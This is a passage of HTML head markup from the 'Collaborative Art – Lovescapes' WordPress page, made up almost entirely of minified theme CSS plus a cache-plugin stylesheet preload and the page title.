li{display:block;float:none;width:100%}#main-nav ul.sub-menu li a{display:block;padding:6px 14px;border-bottom:1px solid rgba(255,255,255,.07);color:#aaa!important;text-transform:none;line-height:24px!important;margin:0 0 0 -1px}#main-nav ul.sub-menu li a span{display:inline;width:100%;position:relative}#main-nav ul.sub-menu li:last-child>a{border-bottom:none!important}#main-nav>li>a{font-size:14px;color:#444;letter-spacing:0;z-index:99999}#main-nav>li,#main-nav>li>a{line-height:inherit}#main-nav>li>a>span{position:relative;top:3px;border-bottom:2px solid #eee;padding-bottom:3px}.minimal-skin #main-nav>li a span{border-bottom:none!important}.minimal-skin #main-nav li.current-menu-item>a{background-color:transparent!important;color:var(--colorPrimary)}#main-content{padding-top:50px;overflow:hidden;position:relative;z-index:997}#contact-button{display:block;position:fixed;text-align:center;right:20px;bottom:7px;color:#fff;z-index:10000;height:40px;width:40px;background-color:rgba(0,0,0,.4);background-repeat:no-repeat;background-position:center;-webkit-touch-callout:none;-webkit-backface-visibility:hidden;backface-visibility:hidden}#contact-button i{line-height:40px!important;width:40px!important;height:40px!important;font-size:16px!important;top:0!important;left:0!important;text-align:center!important;background-color:transparent!important;margin-top:1px!important}#contact-panel{position:fixed;z-index:10001;right:20px;bottom:50px;height:auto;width:235px;padding:25px;background:#fff;border:1px solid #ebebeb;opacity:0;visibility:hidden;-webkit-transform:scale(.9);-ms-transform:scale(.9);transform:scale(.9);-webkit-transform-origin:100% 100%;-moz-transform-origin:100% 100%;-ms-transform-origin:100% 100%;-o-transform-origin:100% 100%}#contact-panel-form{margin-top:15px}#contact-panel p{margin-bottom:7px}#hb-submit-contact-panel-form{margin:15px 0 0;display:block}#main-content .hb-sidebar{margin-top:-50px;padding-top:50px;padding-bottom:70px;border-left:1px solid #ebebeb;margin-bottom:0!important;width:29%!important}#main-content .right-sidebar .col-3.hb-sidebar{padding-right:0!important}#main-content .col-9.hb-main-content{border-right:1px solid #ebebeb;margin-right:-1px;margin-bottom:0!important;padding-bottom:70px;padding-right:30px!important;min-height:470px;width:71%!important;padding-left:0!important}.hb-sidebar-20 #main-content .hb-sidebar{width:20%!important}.hb-sidebar-20 #main-content .col-9.hb-main-content{width:80%!important}.featured-image a{overflow:hidden;display:block}.featured-image img{position:relative;-webkit-backface-visibility:hidden;width:100%;max-width:100%;display:block}.featured-image{position:relative;border-radius:2px 2px 0 0;overflow:hidden}.post-content{padding:20px 30px;background:padding-box #fff;position:relative;-webkit-background-clip:padding-box;-webkit-box-shadow:0 1px 2px rgba(0,0,0,.1);box-shadow:0 1px 2px rgba(0,0,0,.1);-moz-border-radius-bottomleft:3px;-moz-border-radius-bottomright:3px;-webkit-border-bottom-left-radius:3px;-webkit-border-bottom-right-radius:3px;border-bottom-left-radius:3px;border-bottom-right-radius:3px}.post-header .post-meta-info{color:#999;font-size:12px}.post-content h2.title{margin-top:0;margin-bottom:5px;font-size:18px}.post-content h2.title a{color:var(--colorPrimary)}.hb-post-excerpt{margin-top:1.5em}.widget-item{position:relative}.widget_nav_menu ul.menu{border:1px solid #ebebeb;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px;-o-border-radius:2px}#main-wrapper .widget_nav_menu ul.menu li{padding:0}#main-wrapper .widget_nav_menu ul.menu li a{padding:10px 14px;border-left:2px solid transparent;text-overflow:ellipsis;background:#fff;color:#333}#main-wrapper .widget_nav_menu ul.menu li.current-menu-item>a{background:#f9f9f9;color:#000}#main-wrapper .widget_nav_menu ul.menu ul{margin-left:0}#main-wrapper .widget_nav_menu ul.menu ul li a{padding-left:38px}#main-wrapper .widget_nav_menu ul.menu ul li:before{content:'\e26f';font-family:icomoon;font-weight:400;font-style:normal;display:block;float:left;text-decoration:inherit;position:relative;top:11px;left:22px;font-size:10px;z-index:1;opacity:.2}#main-wrapper .widget_nav_menu ul.menu ul li:first-child{border-top:1px solid #ebebeb}.widget-item ul li{padding:7px 0;display:block}.widget-item ul li>a{display:block}.widget_nav_menu ul>li:first-child{border-top:0}.widget_nav_menu ul>li{border-top:1px solid rgba(255,255,255,.1)}.hb-sidebar .widget_nav_menu ul>li{border-top-color:rgba(0,0,0,.07)}.widget_nav_menu ul>li a:before{content:'\f105';font-family:FontAwesome;font-weight:400;font-style:normal;display:block;float:right;text-decoration:inherit;font-size:14px}#main-content .hb-sidebar .widget-item{padding-left:15px!important;margin-bottom:40px}#hb-modal-overlay{position:fixed;left:0;top:0;width:100%;height:100%;background:rgba(0,0,0,.8);-webkit-backface-visibility:hidden;z-index:99999;display:none;overflow-y:auto!important}.plus-sign{width:30px;height:30px;background-image:url(/wp-content/themes/HighendWP/assets/images/plus-icon.png);background-repeat:no-repeat;background-position:center center;overflow:hidden;display:inline-block}.item-overlay-text{opacity:0;filter:alpha(opacity=0)}.item-overlay-text{position:absolute;top:0;height:100%;left:0;width:100%;text-align:center;z-index:99;background:rgba(0,0,0,.8)}.item-overlay-text-wrap{display:block;position:relative;top:50%;margin-top:-30px;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}.item-overlay-text{opacity:0}.hb-push-button-icon{position:absolute;left:0;top:0;margin-top:-9px;width:100%;height:100%;display:block;z-index:101;text-align:center;-webkit-backface-visibility:hidden;backface-visibility:hidden;opacity:0}.hb-push-button-icon i{margin-right:0!important}.hb-push-button-text{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);position:relative;display:block;opacity:1}.clearfix:after,.clearfix:before,.container-wide:after,.container-wide:before,.container:after,.container:before,.row:after,.row:before{content:'<meta charset="UTF-8">20';display:block;overflow:hidden;visibility:hidden;width:0;height:0}.clearfix:after,.container-wide:after,.container:after,.row:after{clear:both}.clearfix,.container,.container-wide,.row{zoom:1}.hb-button,a.read-more{position:relative;display:inline-block;margin-right:10px;margin-bottom:10px;vertical-align:middle;text-align:center;zoom:1;font-family:source_sans_probold,Arial;font-size:12px;line-height:1.3;letter-spacing:1.5px;text-transform:uppercase;color:#fff!important;-webkit-box-shadow:0 3px 0 0 #009eb7;box-shadow:0 3px 0 0 #009eb7;padding:16px 20px 12px;overflow:hidden;border-radius:2px;-webkit-border-radius:2px;-moz-border-radius:2px}.hb-button i{position:relative;top:-1px;font-size:1.4em;margin-right:8px}#main-wrapper .hb-asbestos{background:rgba(127,140,141,.8);-webkit-box-shadow:0 3px 0 0 rgba(107,120,121,.9);box-shadow:0 3px 0 0 rgba(107,120,121,.9)}a.read-more{background:0 0!important;border:2px solid rgba(0,0,0,.1);color:#323436!important;-webkit-box-shadow:none;box-shadow:none;padding:13px 40px!important}a.read-more{padding:9px 15px!important;font-size:12px;color:#999;margin-top:25px}.hb-button.no-three-d{-webkit-box-shadow:none!important;box-shadow:none!important;border-radius:0;-webkit-border-radius:0;-moz-border-radius:0}.hb-button i{margin-top:0!important;vertical-align:-4px}.hb-button.hb-small-button{padding:15px 16px 13px!important;font-size:12px;letter-spacing:1px}.hb-effect-11 #main-nav>li>a:before{position:absolute;top:20px;left:50%;color:transparent;content:'•';text-shadow:0 0 transparent;font-size:1.2em;-webkit-transform:translateX(-50%);-ms-transform:translateX(-50%);transform:translateX(-50%);background:0 0}:root{--colorPrimary:#00aeef;--colorWhite:#fff;--selectionColor:var(--colorWhite);--selectionBgColor:var(--colorPrimary)}.container-wide:after,.container-wide:before,.container:after,.container:before{content:"";display:table;clear:both}#header-inner-bg{-webkit-box-sizing:border-box;box-sizing:border-box}.hb-focus-color{color:var(--colorPrimary)}#main-wrapper{width:100%;overflow:hidden}#main-wrapper.fw-100 .container{max-width:100%!important}.container,.container-wide{position:relative;display:block;max-width:1240px;width:100%;padding-left:50px;padding-right:50px;margin-left:auto;margin-right:auto}@media handheld,only screen and (max-width:767px){.container,.container-wide{padding-left:30px;padding-right:30px}}.container-wide{max-width:100%}#logo{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}#logo img{display:-webkit-box;display:-ms-flexbox;display:flex;max-height:100%;width:auto;vertical-align:middle}#logo .retina{display:none}@media (-webkit-min-device-pixel-ratio:1.5),(min-resolution:144dpi){#logo .hb-visible-logo .default{display:none}}@media (-webkit-min-device-pixel-ratio:2),(min-resolution:192dpi){#logo .hb-visible-logo .default{display:none}#logo .hb-visible-logo .retina{display:block}}@media (-webkit-min-device-pixel-ratio:1.5),(min-resolution:144dpi){#logo .hb-visible-logo .retina{display:block}}.hb-logo-wrap{display:none;max-height:100%;z-index:1}.hb-logo-wrap.hb-visible-logo{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0}#header-inner{display:-webkit-box;display:-ms-flexbox;display:flex}#header-inner.nav-type-1 #header-inner-bg>.container-wide{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;width:100%;height:100%}#header-inner.nav-type-1 .main-navigation{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;-ms-flex-negative:0;flex-shrink:0}#header-inner.nav-type-1 #logo{margin-right:20px}#header-inner.nav-type-1 #logo .hb-logo-wrap{max-height:55%}.hb-blog-grid{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-ms-flex-wrap:wrap;flex-wrap:wrap}.hb-blog-grid article{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;padding-left:15px;padding-right:15px;margin-bottom:20px;-webkit-box-sizing:border-box;box-sizing:border-box;-webkit-backface-visibility:hidden;backface-visibility:hidden}.hb-blog-grid article>div{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0}.hb-blog-grid .hb-post-excerpt,.hb-blog-grid article .post-content{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1}.hb-blog-grid.grid-columns-3 article{width:33%}.post-meta-footer{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;-ms-flex-wrap:wrap;flex-wrap:wrap}.post-meta-footer .read-more{margin:10px 0}.post-meta-footer .inner-meta-footer{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row;margin-left:auto}@media handheld,only screen and (max-width:1024px){.container{width:100%!important;margin-top:0;margin-bottom:0}.hb-sidebar-20 #main-content .col-9.hb-main-content,.hb-sidebar-20 #main-content .hb-sidebar{width:100%!important;border:none}.hb-sidebar-20 #main-content .hb-sidebar,.hb-sidebar-20 #main-content .hb-sidebar .widget-item{padding-left:0!important;padding-right:0!important}}@media handheld,only screen and (max-width:900px){.container{width:100%!important}#main-content .right-sidebar .hb-main-content.col-9{padding-right:0!important}#main-nav{display:none!important}#show-nav-menu{display:inline-block}.hb-blog-grid.grid-columns-3 article{width:50%!important}}@media handheld,only screen and (max-width:767px){#main-content .hb-main-content.col-9{width:100%!important;padding-left:0!important;padding-right:0!important;border-left:none!important;border-right:none!important;margin-top:0!important}#main-content .hb-sidebar{width:100%!important;border-right:none!important;border-left:none!important;padding-left:0!important;padding-right:0!important;margin-bottom:50px!important;margin-top:50px!important}.row .col-3,.row .col-9{width:100%!important;padding-top:0!important;margin-bottom:30px!important}#main-content .hb-sidebar .widget-item{padding-left:0!important}}@media handheld,only screen and (max-width:600px){.hb-blog-grid.grid-columns-3 article{width:100%!important}}.hb-moon-envelop,.hb-moon-paper-plane{font:14px/1 Icomoon;text-decoration:inherit;text-rendering:auto;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;width:auto;height:auto;vertical-align:middle}.hb-moon-paper-plane:before{content:"\e156"}.hb-moon-envelop:before{content:"\e489"}.hb-icon-x{display:inline-block;font:14px/1 hbicons;font-size:inherit;text-rendering:auto;vertical-align:middle;-webkit-font-smoothing:antialiased}.hb-icon-x:before{content:"\e003"}i[class^=icon-]{display:inline-block;font:14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.icon-bars:before{content:"\f0c9"}:root{--colorPrimary:#d00}#main-wrapper .widget_nav_menu ul.menu li.current-menu-item>a{border-left-color:#d00}#main-wrapper .right-sidebar .widget_nav_menu ul.menu li.current-menu-item>a{border-right-color:#d00}.hb-button,a.read-more{background:#d00}.hb-effect-11 #main-nav>li.current-menu-item>a:before{color:#d00;text-shadow:7px 0 #d00,-7px 0 #d00}.hb-button{box-shadow:0 3px 0 0 #ab0000}#header-inner-bg{background-color:#000}#header-inner-bg{border-bottom-color:#000}#main-wrapper #main-nav>li>a,#main-wrapper #header-inner-bg{color:#fff}body:not(.page-template-presentation-fullwidth) #main-wrapper #main-nav>li>a,#main-wrapper #header-inner-bg{color:#fff!important}body{background-color:#fff}#main-wrapper,#main-wrapper.hb-stretched-layout{background-color:#fff}#main-wrapper .hb-main-content,#main-wrapper .hb-sidebar{color:#383838}.hb-main-content a{color:#d00}.widget_nav_menu ul.menu,#contact-panel,#contact-panel:after{border-color:#fff}#main-content .hb-sidebar{border-left-color:#fff}#main-wrapper .widget_nav_menu ul.menu ul li:first-child{border-top-color:#fff}#main-content .col-9.hb-main-content{border-right-color:#fff}h2{color:#000}h4{color:#7a7a7a}#logo .hb-logo-wrap{height:100%!important;max-height:100%!important}.nav-type-1 #header-inner-bg{height:80px!important;line-height:80px!important}#show-nav-menu i,.nav-type-1 #show-nav-menu{margin-right:0;color:#f4524d}#show-nav-menu i,.nav-type-1 #show-nav-menu{margin-right:0;color:#f4524d}</style><link rel="preload" data-asynced="1" data-optimized="2" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://lovescapes.ca/wp-content/litespeed/ucss/a8b57022507475569be26dea0a406012.css?ver=54551" /><script data-optimized="1" type="litespeed/javascript" data-src="https://lovescapes.ca/wp-content/plugins/litespeed-cache/assets/js/css_async.min.js"></script> <meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Collaborative Art – Lovescapes